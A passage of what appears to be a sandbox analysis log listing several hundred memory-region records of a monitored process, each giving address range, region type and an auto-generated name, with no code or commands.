0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 6799 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 6800 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 6802 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 6803 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 6804 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 6805 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 6807 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 6808 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 6809 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 6810 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 6812 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 6813 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 6814 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 6815 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 6816 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 6817 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 6818 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 6819 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 6822 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 6823 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 6824 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 6825 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 6827 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 6828 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 6829 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 6830 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 6833 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6834 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6835 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 6836 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6837 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6838 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6839 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 6840 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6842 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6843 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6844 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 6845 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6847 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6848 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6849 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 6850 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6851 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6852 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6853 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6854 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6855 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6856 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6857 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6858 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6859 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6860 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6861 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6862 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6863 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6864 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6865 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6866 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6867 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6869 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6870 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6871 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6872 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6873 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6874 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6875 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6876 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6877 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6878 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6879 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6880 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6881 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6882 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6883 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6884 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6885 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6886 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6887 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6888 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6889 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6890 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6891 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6892 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6893 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6894 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6895 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6896 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6897 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6898 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6899 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6900 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6901 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6902 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6903 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6904 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6905 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6906 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6907 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6908 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6909 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6910 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6911 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6912 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6913 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 6914 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6915 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6916 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6917 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6918 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6919 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6920 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6921 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6922 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6923 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6924 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6925 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6926 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6927 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6928 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6929 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6930 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6931 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6932 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6933 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6934 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6935 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6936 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6937 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6938 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6939 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6940 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6941 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6942 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6943 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6944 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6945 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6946 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6947 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6948 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6949 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6950 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6951 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6952 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6953 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6954 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6955 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6956 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6957 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6958 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6959 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6960 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6961 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6962 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6963 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6964 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6965 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6966 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6967 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6968 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6969 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6970 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6971 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6972 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6973 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6974 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6975 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6976 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6977 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6978 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6979 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6980 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6981 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6982 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6983 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6984 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6985 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6986 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6987 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6988 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6989 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6990 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6991 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6992 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6993 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6994 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6995 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6996 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6997 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6998 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6999 start_va = 0x580000 end_va = 